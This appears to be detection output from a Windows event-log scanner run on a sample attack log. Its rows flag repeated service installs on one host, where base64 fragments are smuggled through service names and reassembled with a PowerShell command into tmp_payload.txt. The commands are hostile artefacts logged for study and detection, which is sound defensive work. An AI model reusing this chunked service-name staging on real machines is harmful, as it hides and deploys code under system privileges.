2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
